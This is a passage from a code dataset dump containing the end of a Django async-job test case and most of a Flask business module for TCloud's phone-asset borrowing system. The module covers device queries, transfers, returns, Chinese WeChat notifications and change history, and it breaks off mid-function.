'.create_user_schema_if_not_exists', mock.Mock())\nclass AsyncTestCase(AsyncTestMixin, TestCase):\n\n databases = ('default', 'data', 'tap', 'oai')\n\n fixtures = (\n 'auth.json',\n 'metadata.json',\n 'jobs.json',\n 'queryjobs.json',\n 'examples.json'\n )\n\n users = (\n ('admin', 'admin'),\n ('user', 'user'),\n ('evil', 'evil'),\n ('anonymous', None),\n )\n\n url_names = {\n 'list': 'tap:async-list',\n 'detail': 'tap:async-detail',\n 'results': 'tap:async-results',\n 'result': 'tap:async-result',\n 'parameters': 'tap:async-parameters',\n 'destruction': 'tap:async-destruction',\n 'executionduration': 'tap:async-executionduration',\n 'phase': 'tap:async-phase',\n 'error': 'tap:async-error',\n 'quote': 'tap:async-quote',\n 'owner': 'tap:async-owner'\n }\n\n jobs = QueryJob.objects.filter(owner__username='user')\n\n def get_parameter_for_new_jobs(self, username):\n return [{\n 'LANG': example.query_language,\n 'QUERY': example.query_string\n } for example in Example.objects.filter(access_level='PUBLIC')]\n\n def get_parameter_for_new_jobs_internal(self, username):\n return [{\n 'LANG': example.query_language,\n 'QUERY': example.query_string\n } for example in Example.objects.filter(access_level='INTERNAL')]\n"} {"ext": "py", "sha": "1a2efac3154f2d441117018b9a8e276b2fdc06ab", "content": "import json\nimport traceback\nfrom datetime import timedelta\n\nfrom flask import request, g, current_app\nfrom sqlalchemy import desc, func\n\nfrom apps.auth.models.users import User\nfrom apps.project.business.credit import CreditBusiness\nfrom apps.project.models.assets import Phone, PhoneRecord, VirtualAsset, PhoneBorrow\nfrom apps.project.models.credit import Credit\nfrom apps.public.models.public import Config\nfrom library.api.db import db\nfrom library.api.transfer import transfer2json\nfrom library.notification import notification\nfrom library.trpc import Trpc\n\nuser_trpc = Trpc('auth')\n\n\nclass PhoneBusiness(object):\n public_trpc = Trpc('public')\n user_trpc = Trpc('auth')\n message_trpc = Trpc('message')\n\n @classmethod\n def _query(cls):\n return Phone.query.add_columns(\n Phone.id.label('id'),\n Phone.name.label('name'),\n Phone.asset_id.label('asset_id'),\n Phone.vendor.label('vendor'),\n Phone.device_number.label('device_number'),\n Phone.os.label('os'),\n Phone.cpu.label('cpu'),\n Phone.core.label('core'),\n Phone.ram.label('ram'),\n Phone.rom.label('rom'),\n Phone.resolution.label('resolution'),\n Phone.buy_date.label('buy_date'),\n Phone.region.label('region'),\n Phone.status.label('status'),\n Phone.borrow_id.label('borrow_id'),\n Phone.creator_id.label('creator_id'),\n Phone.device_source.label('device_source'),\n Phone.device_belong.label('device_belong'),\n )\n\n @classmethod\n @transfer2json(\n '?id|!name|!asset_id|!vendor|!device_number|!os|!cpu|!core|!ram|!rom|!resolution|!buy_date|!region|!status|'\n '!borrow_id|!creator_id|!device_source|!device_belong'\n )\n def query_all_json(cls, page_size, page_index):\n ret = cls._query().filter(\n Phone.status == Phone.ACTIVE).order_by(\n desc(Phone.id)).limit(int(page_size)).offset(\n int(page_index - 1) * int(page_size)).all()\n return ret\n\n @classmethod\n def query_all_count(cls):\n count = cls._query().filter(Phone.status == Phone.ACTIVE).count()\n return count\n\n @classmethod\n @transfer2json(\n '?id|!name|!asset_id|!vendor|!device_number|!os|!cpu|!core|!ram|!rom|!resolution|!buy_date|!region|!status|'\n '!borrow_id|!creator_id|!device_source|!device_belong'\n )\n def query_json_by_id(cls, pid):\n return cls._query().filter(\n Phone.id == pid, Phone.status == Phone.ACTIVE).all()\n\n @classmethod\n def get_phone_by_id(cls, pid):\n users = user_trpc.requests(method='get', path='/user')\n phone = cls.query_json_by_id(pid)\n\n if len(phone) <= 0:\n return 101, 'phone not exist!'\n phone = phone[0]\n for user in users:\n if user.get('userid') == phone.get('creator_id'):\n phone['creator_nickname'] = user.get('nickname')\n if user.get('userid') == phone.get('borrow_id'):\n phone['borrow_nickname'] = user.get('nickname')\n return 0, [phone]\n\n @classmethod\n def send_message(cls, user_list, creator, text):\n if cls.message_trpc.requests('post', '/message',\n body={'send_id': creator, 'rec_id': user_list, 'content': text}):\n current_app.logger.info('发送站内信成功')\n else:\n current_app.logger.info('发送站内信失败')\n\n @classmethod\n def get_phone_all(cls, page_size, page_index):\n\n # 通过设备名称进行搜索\n name = request.args.get('name', '')\n # 通过制造商进行搜索\n vendor = request.args.get('vendor', '')\n # 通过系统进行搜索\n os = request.args.get('os', '')\n # 通过分辨率进行搜索\n resolution = request.args.get('resolution', '')\n # 通过借用人进行搜索\n borrower_id = request.args.get('borrower_id')\n # 通过持有人进行搜索\n creator_id = request.args.get('creator_id')\n # 通过 归属\n device_belong = request.args.get('device_belong', '')\n # 通过 来源\n device_source = request.args.get('device_source', '')\n # 通过 归属人\n # 获取所有 手机设备列表\n phones, count = cls.search_phone_all(name, vendor, os, resolution, borrower_id, device_belong,\n device_source, creator_id, page_size, page_index)\n # 获取所有用户的 基本信息\n users = {int(user.get('userid')): user\n for user in user_trpc.requests(method='get', path='/user', query={'base_info': True})}\n # 获取所有借用关系列表\n phone_borrows = {phone_borrow.phone_id: phone_borrow for phone_borrow in PhoneBorrow.query.all()}\n data = []\n for phone in phones:\n phone_borrow = phone_borrows.get(phone.get('id'))\n if g.userid == phone.get('borrow_id'):\n phone[\"move_status\"] = 1\n else:\n phone[\"move_status\"] = 0\n\n if PhoneBusiness.in_confirm_status(phone_borrow):\n phone[\"move_status\"] = 2\n\n if PhoneBusiness.need_confirm_status(phone_borrow):\n phone[\"confirm_status\"] = 0\n else:\n phone[\"confirm_status\"] = 1\n\n try:\n borrower = users.get(phone.get('borrow_id')).get(\"nickname\")\n creator = users.get(phone.get('creator_id')).get('nickname')\n\n phone['borrow_nickname'] = borrower\n phone['creator_nickname'] = creator\n # 有此条借用记录\n if phone_borrow:\n user_list = [int(uid) for uid in phone_borrow.user_list.split(',') if uid != '']\n # 有需要确认的用户\n if phone_borrow.confirm_userid != 0:\n confirm_user_nickname = users.get(phone_borrow.confirm_userid).get('nickname')\n phone['borrow_status'] = f'[{confirm_user_nickname}] 待接收'\n # 用户借用列表\n elif user_list:\n user_list_temp = [users.get(userid).get('nickname') for userid in user_list]\n phone['borrow_status'] = f'[{\",\".join(user_list_temp)}] 申请借用'\n phone['move_status'] = 3 if phone[\"move_status\"] == 1 else 0\n # 无借用、确认、归还\n else:\n phone['borrow_status'] = f'[{borrower}] 持有'\n else:\n phone['borrow_status'] = f'[{borrower}] 持有'\n except Exception as e:\n current_app.logger.error(e)\n phone['borrow_status'] = '未知'\n phone['borrow_nickname'] = '未知'\n\n data.append(phone)\n current_app.logger.info(data)\n return data, count\n\n @classmethod\n @transfer2json(\n '?id|!name|!asset_id|!vendor|!device_number|!os|!cpu|!core|!ram|!rom|!resolution|!buy_date|!region|!status|'\n '!borrow_id|!creator_id|!device_source|!device_belong'\n )\n def search_phone_json(cls, data):\n return data.all()\n\n @classmethod\n def search_phone_all(cls, name, vendor, os, resolution, borrower_id, device_belong, device_source, creator_id,\n page_size, page_index):\n try:\n\n data_all = cls._query().filter(Phone.status == Phone.ACTIVE)\n if name != '':\n data_all = data_all.filter(Phone.name.like(f'%{name}%'))\n if vendor != '':\n data_all = data_all.filter(Phone.vendor.like(f'%{vendor}%'))\n if os != '':\n data_all = data_all.filter(Phone.os.like(f'%{os}%'))\n if resolution != '':\n data_all = data_all.filter(Phone.resolution.like(f'%{resolution}%'))\n if device_belong != '':\n data_all = data_all.filter(Phone.device_belong.like(f'%{device_belong}%'))\n if device_source != '':\n data_all = data_all.filter(Phone.device_source.like(f'%{device_source}%'))\n if borrower_id:\n data_all = data_all.filter(Phone.borrow_id == borrower_id)\n if creator_id:\n data_all = data_all.filter(Phone.creator_id == creator_id)\n\n count = data_all.count()\n data = cls.search_phone_json(\n data_all.order_by(desc(Phone.id)).limit(int(page_size)).offset(int(page_index - 1) * int(page_size)))\n return data, count\n except Exception as e:\n current_app.logger.error(e)\n\n @classmethod\n def get_holder_json(cls):\n # 获取所有持有者的信息\n try:\n data_all = []\n temp = []\n phones = Phone.query.add_columns(Phone.borrow_id.label('borrow_id')).filter(\n Phone.status == Phone.ACTIVE).all()\n for phone in phones:\n if phone.borrow_id not in temp:\n temp.append(phone.borrow_id)\n user = cls.user_trpc.requests('get', '/user/{}'.format(phone.borrow_id))[0]\n data = {\n 'nickname': user.get('nickname'),\n 'id': user.get('userid')\n }\n data_all.append(data)\n return data_all\n except Exception as e:\n current_app.logger.error(e)\n\n @classmethod\n def can_move_status(cls, phone_id):\n # 判断此设备是否归属于当前用户\n phone = Phone.query.get(phone_id)\n if phone and phone.borrow_id == g.userid:\n return True\n else:\n return False\n\n @classmethod\n def need_confirm_status(cls, phone_borrow):\n # 判断此手机需要是否当前用户确认\n try:\n if phone_borrow is not None:\n if int(phone_borrow.confirm_userid) == g.userid:\n return True\n else:\n return False\n else:\n return False\n except Exception as e:\n current_app.logger.error(e)\n current_app.logger.error(traceback.format_exc())\n return 101, str(e)\n\n @classmethod\n def in_confirm_status(cls, phone_borrow):\n # 判断此设备是否存在于确认流程中\n try:\n if phone_borrow is not None:\n if int(phone_borrow.confirm_userid) != 0:\n return True\n return False\n else:\n return False\n except Exception as e:\n current_app.logger.error(e)\n current_app.logger.error(traceback.format_exc())\n return 101, str(e)\n\n @classmethod\n def qyweixin_email(cls, user_ids, text):\n if not isinstance(user_ids, list):\n user_ids = [user_ids]\n notification.send_notification(user_ids, text, creator=0)\n return 0, 'success'\n\n @classmethod\n def send_need_confirm_msg(cls, current_phone, phone_current_holder, phone_new_holder):\n deadline = PhoneBusiness.deadline(current_phone)\n new_holder_msg_text = \"\"\"[TCloud] {} ({})\n您有一台设备需要确认接收:\n设备 : {},\n资产编号 : {},\n原持有人 : {} (微信号: {})\n现持有人 : {} (微信号: {})\n请及时到系统中确认接收!\"\"\".format(phone_new_holder.nickname, phone_new_holder.wx_userid,\n current_phone.name, current_phone.asset_id, phone_current_holder.nickname,\n phone_current_holder.wx_userid, phone_new_holder.nickname,\n phone_new_holder.wx_userid)\n # phone_current_holder 原持有人\n # phone_new_holder 确认人\n\n ret, msg = PhoneBusiness.qyweixin_email(phone_new_holder.id, new_holder_msg_text)\n return ret, msg\n\n @classmethod\n def send_cancel_move_msg(cls, current_phone, phone_current_holder, phone_new_holder):\n deadline = PhoneBusiness.deadline(current_phone)\n new_holder_msg_text = \"\"\"[TCloud] {} ({})\n您有一台设备由于超过 3 天没有接收,已被系统退回:\n设备 : {},\n资产编号 : {},\n现持有人 : {} (微信号: {})\n\"\"\".format(phone_new_holder.nickname, phone_new_holder.wx_userid, current_phone.name, current_phone.asset_id,\n phone_new_holder.nickname, phone_new_holder.wx_userid)\n # phone_current_holder 原持有人\n # phone_new_holder 确认人\n\n ret, msg = PhoneBusiness.qyweixin_email(phone_current_holder.id, new_holder_msg_text)\n return ret, msg\n\n @classmethod\n def send_need_move_msg(cls, current_phone, phone_current_holder):\n new_holder_msg_text = \"\"\"[TCloud] {} ({})\n您有一条借用请求需要处理:\n设备 : {}\n资产编号 : {}\n请及时到系统中处理!\n请通过 TCloud->资产->流转 进行转出。\"\"\".format(phone_current_holder.nickname, phone_current_holder.wx_userid,\n current_phone.name, current_phone.asset_id,\n phone_current_holder.wx_userid)\n\n # phone_current_holder 当前持有人\n\n ret, msg = PhoneBusiness.qyweixin_email(phone_current_holder.id, new_holder_msg_text)\n return ret, msg\n\n @classmethod\n def send_create_msg_qywx(cls, current_phone, phone_holder):\n msg_text = \"\"\"[TCloud] {} ({})\n您拥有了一台新的设备:\n设备 : {},\n资产编号 : {},\n持有人 : {} (微信号: {})\"\"\".format(phone_holder.nickname, phone_holder.wx_userid,\n current_phone.name, current_phone.asset_id, phone_holder.nickname,\n phone_holder.wx_userid, )\n\n ret, msg = PhoneBusiness.qyweixin_email(phone_holder.id, msg_text)\n return ret, msg\n\n @classmethod\n def send_delay_msg_qywx(cls, current_phone, phone_holder):\n deadline = PhoneBusiness.deadline(current_phone)\n msg_text = \"\"\"[TCloud] {} ({})\n您拥有的一台设备需要归还:\n设备 : {},\n资产编号 : {},\n持有人 : {} (微信号: {})\n到期时间: {}\n续借 : 请到系统中点击 续借 进行续借\n归还 : 请到系统中点击 退回 进行归还\n过期 2 天后会根据超时时间扣除信用分!请及时归还!\"\"\".format(phone_holder.nickname, phone_holder.wx_userid,\n current_phone.name, current_phone.asset_id, phone_holder.nickname,\n phone_holder.wx_userid, deadline)\n\n return PhoneBusiness.qyweixin_email(phone_holder.id, msg_text)\n\n @classmethod\n def send_move_msg_qywx(cls, current_phone, phone_current_holder, phone_new_holder):\n if phone_new_holder.id == phone_current_holder.id:\n current_app.logger.info('[{}](资产编号:{}) 设备状态未发生状态变化'.format(current_phone.name, current_phone.asset_id))\n return\n current_holder_msg_text = \"\"\"[TCloud] {} ({})\n您的一台设备状态将要发生变化:\n设备 : {},\n资产编号 : {},\n变化 : 持有人将 由 {} (微信号: {}) 变为 {} (微信号: {})\n状态 : 等待接收人确认\"\"\".format(phone_current_holder.nickname, phone_current_holder.wx_userid,\n current_phone.name, current_phone.asset_id, phone_current_holder.nickname,\n phone_current_holder.wx_userid, phone_new_holder.nickname,\n phone_new_holder.wx_userid)\n\n ret, msg = PhoneBusiness.qyweixin_email(phone_current_holder.id, current_holder_msg_text)\n\n deadline = PhoneBusiness.deadline(current_phone)\n new_holder_msg_text = \"\"\"[TCloud] {} ({})\n您将拥有一台新的设备:\n设备 : {},\n资产编号 : {},\n原持有人 : {} (微信号: {})\n现持有人 : {} (微信号: {})\n可持有时间: {} 天\n到期时间: {}\n请及时到系统中确认接收!\"\"\".format(phone_new_holder.nickname, phone_new_holder.wx_userid,\n current_phone.name, current_phone.asset_id, phone_current_holder.nickname,\n phone_current_holder.wx_userid,\n phone_new_holder.nickname, phone_new_holder.wx_userid, Phone.HOLD_DATE, deadline)\n # phone_current_holder 原持有人\n # phone_new_holder 新持有人\n\n ret, msg = PhoneBusiness.qyweixin_email(phone_new_holder.id, new_holder_msg_text)\n return ret, msg\n\n @classmethod\n def send_move_confirm_msg_qywx(cls, current_phone, phone_current_holder, phone_new_holder):\n if phone_new_holder.id == phone_current_holder.id:\n current_app.logger.info('[{}](资产编号:{}) 设备状态未发生状态变化'.format(current_phone.name, current_phone.asset_id))\n return\n current_holder_msg_text = \"\"\"[TCloud] {} ({})\n您的一台设备状态发生了变化:\n设备 : {},\n资产编号 : {},\n变化 : 持有人已 由 {} (微信号: {}) 变为 {} (微信号: {})\n状态 : 已接收\"\"\".format(phone_current_holder.nickname, phone_current_holder.wx_userid,\n current_phone.name, current_phone.asset_id, phone_current_holder.nickname,\n phone_current_holder.wx_userid, phone_new_holder.nickname,\n phone_new_holder.wx_userid)\n\n ret, msg = PhoneBusiness.qyweixin_email(phone_current_holder.id, current_holder_msg_text)\n\n deadline = PhoneBusiness.deadline(current_phone)\n new_holder_msg_text = \"\"\"[TCloud] {} ({})\n您拥有了一台新的设备:\n设备 : {},\n资产编号 : {},\n原持有人 : {} (微信号: {})\n现持有人 : {} (微信号: {})\n可持有时间: {} 天\n到期时间: {}\n状态: 已接收!\"\"\".format(phone_new_holder.nickname, phone_new_holder.wx_userid,\n current_phone.name, current_phone.asset_id, phone_current_holder.nickname,\n phone_current_holder.wx_userid,\n phone_new_holder.nickname, phone_new_holder.wx_userid, Phone.HOLD_DATE, deadline)\n # phone_current_holder 原持有人\n # phone_new_holder 新持有人\n\n ret, msg = PhoneBusiness.qyweixin_email(phone_new_holder.id, new_holder_msg_text)\n return ret, msg\n\n @classmethod\n def send_return_msg_qywx(cls, current_phone, phone_current_holder, phone_new_holder):\n if phone_new_holder.id == phone_current_holder.id:\n current_app.logger.info('[{}](资产编号:{}) 设备状态未发生状态变化'.format(current_phone.name, current_phone.asset_id))\n return\n\n current_holder_msg_text = \"\"\"[TCloud] {} ({})\n您归还了一台设备:\n设备 : {},\n资产编号 : {},\n变化 : 持有人将 由 {} (微信号: {}) 变为 {} (微信号: {})\n状态 : 等待接收人确认\"\"\".format(phone_current_holder.nickname, phone_current_holder.wx_userid,\n current_phone.name, current_phone.asset_id,\n phone_current_holder.nickname,\n phone_current_holder.wx_userid,\n phone_new_holder.nickname, phone_new_holder.wx_userid)\n\n PhoneBusiness.qyweixin_email(phone_current_holder.id, current_holder_msg_text)\n\n new_holder_msg_text = \"\"\"[TCloud] {} ({})\n您收到别人归还的一台设备:\n设备 : {},\n资产编号 : {},\n原持有人 : {} (微信号: {})\n持有人 : {} (微信号: {})\n状态 : 等待确认\n请到系统中及时确认接收!\"\"\".format(phone_new_holder.nickname, phone_new_holder.wx_userid, current_phone.name,\n current_phone.asset_id,\n phone_current_holder.nickname, phone_current_holder.wx_userid,\n phone_new_holder.nickname, phone_new_holder.wx_userid)\n\n ret, msg = PhoneBusiness.qyweixin_email(phone_new_holder.id, new_holder_msg_text)\n return ret, msg\n\n @classmethod\n def send_return_confirm_msg_qywx(cls, current_phone, phone_current_holder, phone_new_holder):\n if phone_new_holder.id == phone_current_holder.id:\n current_app.logger.info('[{}](资产编号:{}) 设备状态未发生状态变化'.format(current_phone.name, current_phone.asset_id))\n return\n\n current_holder_msg_text = \"\"\"[TCloud] {} ({})\n您成功归还了一台设备:\n设备 : {},\n资产编号 : {},\n变化 : 持有人已 由 {} (微信号: {}) 变为 {} (微信号: {})\n状态 : 接收人已接收\"\"\".format(phone_current_holder.nickname, phone_current_holder.wx_userid,\n current_phone.name, current_phone.asset_id, phone_current_holder.nickname,\n phone_current_holder.wx_userid,\n phone_new_holder.nickname, phone_new_holder.wx_userid)\n\n PhoneBusiness.qyweixin_email(phone_current_holder.id, current_holder_msg_text)\n\n new_holder_msg_text = \"\"\"[TCloud] {} ({})\n您已接收别人归还的一台设备:\n设备 : {},\n资产编号 : {},\n原持有人 : {} (微信号: {})\n持有人 : {} (微信号: {})\n状态 : 您已接收!\"\"\".format(phone_new_holder.nickname, phone_new_holder.wx_userid, current_phone.name, current_phone.asset_id,\n phone_current_holder.nickname, phone_current_holder.wx_userid,\n phone_new_holder.nickname, phone_new_holder.wx_userid)\n\n ret, msg = PhoneBusiness.qyweixin_email(phone_new_holder.id, new_holder_msg_text)\n return ret, msg\n\n @classmethod\n def deadline(cls, current_phone):\n # 根据 phone 最后一条记录计算到期时间\n phone_recorder = PhoneRecord.query.filter(PhoneRecord.phone_id == current_phone.id).order_by(\n PhoneRecord.id.desc()).first()\n deadline = phone_recorder.creation_time + timedelta(days=Phone.HOLD_DATE) # 到期时间\n return deadline\n\n @classmethod\n def create(cls, name, asset_id, vendor, device_number, os, cpu, core, ram, rom, resolution, buy_date, region,\n borrow_id, device_source, device_belong, creator_id):\n try:\n t = Phone(\n name=name,\n asset_id=asset_id,\n vendor=vendor,\n device_number=device_number,\n os=os,\n cpu=cpu,\n core=core,\n ram=ram,\n rom=rom,\n resolution=resolution,\n buy_date=buy_date,\n region=region,\n borrow_id=borrow_id or g.userid,\n creator_id=creator_id or g.userid,\n device_source=device_source,\n device_belong=device_belong,\n )\n db.session.add(t)\n db.session.flush()\n PhoneRecordBusiness.create(t, g.userid)\n db.session.commit()\n phone_holder = User.query.get(t.creator_id)\n\n # 发送企业微信\n PhoneBusiness.send_create_msg_qywx(t, phone_holder)\n\n return 0, None\n except Exception as e:\n current_app.logger.error(str(e))\n current_app.logger.error(traceback.format_exc())\n return 102, str(e)\n\n # 发起流转\n @classmethod\n def move_to_user(cls, id, borrow_id):\n try:\n\n t = Phone.query.get(id)\n phone_new_holder = User.query.get(borrow_id)\n phone_current_holder = User.query.get(t.borrow_id)\n\n # 消除对应设备已有的申请借用用户列表, 将老用户 id 放入,等待接收\n PhoneBorrowBusiness.clear_borrow_user_list(id, phone_current_holder.id)\n\n # 将设备的借出标志置为 1,等待接受者确认\n PhoneBorrowBusiness.add_user_to_confirm(id, phone_new_holder.id)\n\n # 发送企业微信\n PhoneBusiness.send_move_msg_qywx(t, phone_current_holder, phone_new_holder)\n\n return 0, None\n\n except Exception as e:\n current_app.logger.error(e)\n current_app.logger.error(traceback.format_exc())\n return 102, str(e)\n\n # 确认流转\n @classmethod\n def move(cls, id, borrow_id):\n try:\n t = Phone.query.get(id)\n\n phone_new_holder = User.query.get(borrow_id)\n\n if not phone_new_holder:\n return 101, '要转移的用户不存在,请检查用户信息'\n\n t.borrow_id = borrow_id\n\n db.session.add(t)\n PhoneRecordBusiness.update(t, g.userid)\n db.session.commit()\n\n return 0, None\n except Exception as e:\n current_app.logger.error(e)\n return 102, str(e)\n\n # 退回设备\n @classmethod\n def return_to_admin(cls, id):\n try:\n # 此处返还给 创建人\n current_phone = Phone.query.get(id)\n\n admin_id = current_phone.creator_id\n\n phone_current_holder = User.query.get(current_phone.borrow_id)\n phone_new_holder = User.query.get(admin_id)\n\n PhoneRecordBusiness.update(current_phone, g.userid)\n\n # 发送企业微信\n PhoneBusiness.send_return_msg_qywx(current_phone, phone_current_holder, phone_new_holder)\n\n # 消除对应设备已有的申请借用用户列表, 将老用户 id 放入,等待接收\n PhoneBorrowBusiness.clear_borrow_user_list(id, phone_current_holder.id)\n\n # 增加 admin 到 确认名单\n PhoneBorrowBusiness.add_user_to_confirm(id, admin_id)\n\n return 0, None\n except Exception as e:\n current_app.logger.error(e)\n current_app.logger.error(traceback.format_exc())\n return 102, str(e)\n\n # 超时 3 天未接收设备,将退回\n @classmethod\n def cancel_move_to(cls, id):\n try:\n # 直接清除 phone borrow 数据\n current_phone = Phone.query.get(id)\n\n phone_borrow = PhoneBorrowBusiness.get_borrow_by_phone_id(phone_id=id)\n\n admin_id = current_phone.creator_id\n\n phone_current_holder = User.query.get(phone_borrow.confirm_userid)\n\n phone_new_holder = User.query.get(admin_id)\n\n # 发送企业微信\n cls.send_cancel_move_msg(current_phone, phone_current_holder, phone_new_holder)\n\n ret, msg = PhoneBorrowBusiness.update(phone_borrow.id, phone_borrow.phone_id, 0, '')\n\n return ret, msg\n\n except Exception as e:\n current_app.logger.error(e)\n current_app.logger.error(traceback.format_exc())\n return 102, str(e)\n\n @classmethod\n def update(cls, id, name, asset_id, vendor, device_number, os, cpu, core, ram, rom, resolution, buy_date, region,\n borrow_id, device_source, device_belong, creator_id):\n try:\n t = Phone.query.get(id)\n\n t.name = name\n t.asset_id = asset_id\n t.vendor = vendor\n t.device_number = device_number\n t.os = os\n t.cpu = cpu\n t.core = core\n t.ram = ram\n t.rom = rom\n t.resolution = resolution\n t.buy_date = buy_date\n t.region = region\n t.borrow_id = borrow_id\n t.device_source = device_source\n t.device_belong = device_belong\n t.creator_id = creator_id\n db.session.add(t)\n PhoneRecordBusiness.update(t, g.userid)\n db.session.commit()\n\n return 0, None\n except Exception as e:\n current_app.logger.error(str(e))\n return 102, str(e)\n\n @classmethod\n def delete(cls, id):\n try:\n t = Phone.query.get(id)\n if t is None:\n return 0\n t.status = Phone.DISABLE\n db.session.add(t)\n PhoneRecordBusiness.delete(t, g.userid)\n db.session.commit()\n return 0\n except Exception as e:\n current_app.logger.error(str(e))\n return 105, str(e)\n\n\nclass PhoneRecordBusiness(object):\n\n @classmethod\n @transfer2json(\n '?id|!phone_id|!name|!asset_id|!vendor|!creation_time|!modified_time|!device_number|!os|!cpu|!core|!ram|'\n '!rom|!resolution|!buy_date|!region|!status|!borrow_id|!creator_id|!device_source|!device_belong|!editor_id'\n )\n def query_json_by_id(cls, id):\n return cls._query().filter(\n PhoneRecord.phone_id == id, Phone.status == Phone.ACTIVE).all()\n\n @classmethod\n @transfer2json(\n '?id|!phone_id|!name|!asset_id|!vendor|!creation_time|!modified_time|!device_number|!os|!cpu|!core|!ram|!rom'\n '|!resolution|!buy_date|!region|!status|!borrow_id|!creator_id|!device_source|!device_belong|!editor_id'\n )\n def query_record_json(cls, phone_id):\n ret = cls._query().filter(PhoneRecord.phone_id == phone_id).order_by(PhoneRecord.id).all()\n return ret\n\n @classmethod\n def _query(cls):\n return PhoneRecord.query.add_columns(\n PhoneRecord.id.label('id'),\n PhoneRecord.phone_id.label('phone_id'),\n PhoneRecord.name.label('name'),\n PhoneRecord.asset_id.label('asset_id'),\n PhoneRecord.vendor.label('vendor'),\n func.date_format(PhoneRecord.creation_time, \"%Y-%m-%d %H:%i:%s\").label('creation_time'),\n func.date_format(PhoneRecord.modified_time, \"%Y-%m-%d %H:%i:%s\").label('modified_time'),\n PhoneRecord.device_number.label('device_number'),\n PhoneRecord.os.label('os'),\n PhoneRecord.cpu.label('cpu'),\n PhoneRecord.core.label('core'),\n PhoneRecord.ram.label('ram'),\n PhoneRecord.rom.label('rom'),\n PhoneRecord.resolution.label('resolution'),\n PhoneRecord.buy_date.label('buy_date'),\n PhoneRecord.region.label('region'),\n PhoneRecord.status.label('status'),\n PhoneRecord.borrow_id.label('borrow_id'),\n PhoneRecord.creator_id.label('creator_id'),\n PhoneRecord.device_source.label('device_source'),\n PhoneRecord.device_belong.label('device_belong'),\n PhoneRecord.editor_id.label('editor_id'),\n )\n\n @classmethod\n def create(cls, t, editor_id):\n t_record = PhoneRecord(\n phone_id=t.id,\n name=t.name,\n asset_id=t.asset_id,\n vendor=t.vendor,\n device_number=t.device_number,\n os=t.os,\n cpu=t.cpu,\n core=t.core,\n ram=t.ram,\n rom=t.rom,\n resolution=t.resolution,\n buy_date=t.buy_date,\n region=t.region,\n borrow_id=t.borrow_id,\n creator_id=t.creator_id,\n device_source=t.device_source,\n device_belong=t.device_belong,\n editor_id=editor_id,\n )\n db.session.add(t_record)\n\n @classmethod\n def update(cls, t, editor_id):\n t_record = PhoneRecord(\n phone_id=t.id,\n name=t.name,\n asset_id=t.asset_id,\n vendor=t.vendor,\n device_number=t.device_number,\n os=t.os,\n cpu=t.cpu,\n core=t.core,\n ram=t.ram,\n rom=t.rom,\n resolution=t.resolution,\n buy_date=t.buy_date,\n region=t.region,\n borrow_id=t.borrow_id,\n creator_id=t.creator_id,\n device_source=t.device_source,\n device_belong=t.device_belong,\n editor_id=editor_id,\n )\n db.session.add(t_record)\n\n @classmethod\n def delete(cls, t, editor_id):\n t_record = PhoneRecord(\n phone_id=t.id,\n name=t.name,\n asset_id=t.asset_id,\n vendor=t.vendor,\n device_number=t.device_number,\n os=t.os,\n cpu=t.cpu,\n core=t.core,\n ram=t.ram,\n rom=t.rom,\n resolution=t.resolution,\n buy_date=t.buy_date,\n region=t.region,\n borrow_id=t.borrow_id,\n creator_id=t.creator_id,\n device_source=t.device_source,\n device_belong=t.device_belong,\n editor_id=editor_id,\n )\n db.session.add(t_record)\n\n @classmethod\n def query_record_detail(cls, phone_id):\n ret = cls.query_record_json(phone_id)\n if not ret:\n return []\n ret_list = []\n asset_config = Config.query.add_columns(Config.content.label('content')).filter(Config.module == 'asset',\n Config.module_type == 1).first()\n content = json.loads(asset_config.content)\n operation_dict = content['operation_dict']\n # name = operation_dict.get('name')\n # asset_id = operation_dict.get('asset_id')\n # status = operation_dict.get('status')\n # borrow_id = operation_dict.get('borrow_id')\n\n ret_dict = {}\n\n user_creater = User.query.get(int(ret[0]['editor_id']))\n ret_dict['modified_time'] = ret[0]['creation_time']\n ret_dict['operation'] = \"[{}({})] : 增加新的资产 {}\".format(user_creater.nickname, user_creater.wx_userid,\n ret[0]['name'])\n ret_list.append(ret_dict)\n\n current_app.logger.info(ret)\n\n for r in range(1, len(ret)):\n for asset_key, asset_value in ret[r - 1].items():\n if asset_key in operation_dict.keys():\n current_app.logger.info(\n \"修改的字段:\" + str(asset_key) + \", 字段值:\" + str(asset_value) + \"-->\" + str(ret[r][asset_key]))\n user_editor = User.query.get(int(ret[r]['editor_id']))\n ret_dict = None\n if asset_key in ('borrow_id',):\n ret_dict = {'modified_time': ret[r]['modified_time']}\n if asset_value != ret[r][asset_key]:\n user_from = User.query.filter(User.id == int(asset_value)).first()\n user_to = User.query.filter(User.id == int(ret[r][asset_key])).first()\n ret_dict['operation'] = \"[{}({})] : {} 由 {}({}) 变更为 {}({})\".format(user_editor.nickname,\n user_editor.wx_userid,\n operation_dict[\n asset_key],\n user_from.nickname,\n user_from.wx_userid,\n user_to.nickname,\n user_to.wx_userid)\n else:\n # user_from = User.query.filter(User.id == int(asset_value)).first()\n user_to = User.query.filter(User.id == int(ret[r][asset_key])).first()\n ret_dict['operation'] = \"[{}({})] : 续借了设备,{} 为 {}({})\".format(user_editor.nickname,\n user_editor.wx_userid,\n operation_dict[asset_key],\n user_to.nickname,\n user_to.wx_userid)\n\n else:\n if asset_value != ret[r][asset_key]:\n ret_dict = {\n 'modified_time': ret[r]['modified_time'],\n 'operation': \"[{}({})] : 修改了{} {} 为 {}\".format(user_editor.nickname,\n user_editor.wx_userid,\n operation_dict[asset_key],\n asset_value,\n ret[r][asset_key])\n }\n if ret_dict is not None:\n ret_list.append(ret_dict)\n ret_list = ret_list[::-1]\n return ret_list\n\n\nclass VirtualAssetBusiness(object):\n @classmethod\n def _query(cls):\n return VirtualAsset.query.add_columns(\n VirtualAsset.id.label('id'),\n VirtualAsset.asset_id.label('asset_id'),\n VirtualAsset.passwd.label('passwd'),\n VirtualAsset.administrator.label('administrator'),\n VirtualAsset.bind_tel.label('bind_tel'),\n VirtualAsset.idcard.label('idcard'),\n VirtualAsset.status.label('status'),\n VirtualAsset.asset_type.label('asset_type'),\n VirtualAsset.operator.label('operator')\n )\n\n @classmethod\n @transfer2json(\n '?id|!asset_id|!passwd|!administrator|!idcard|!bind_tel|!status|!asset_type|!operator'\n )\n def query_json_by_id(cls, id):\n return cls._query().filter(VirtualAsset.id == id,\n VirtualAsset.status != VirtualAsset.DISABLE).all()\n\n @classmethod\n def create(cls, asset_id, passwd, administrator, bind_tel, idcard, asset_type, operator):\n try:\n va = VirtualAsset(\n asset_id=asset_id,\n passwd=passwd,\n administrator=administrator,\n bind_tel=bind_tel,\n idcard=idcard,\n asset_type=asset_type,\n 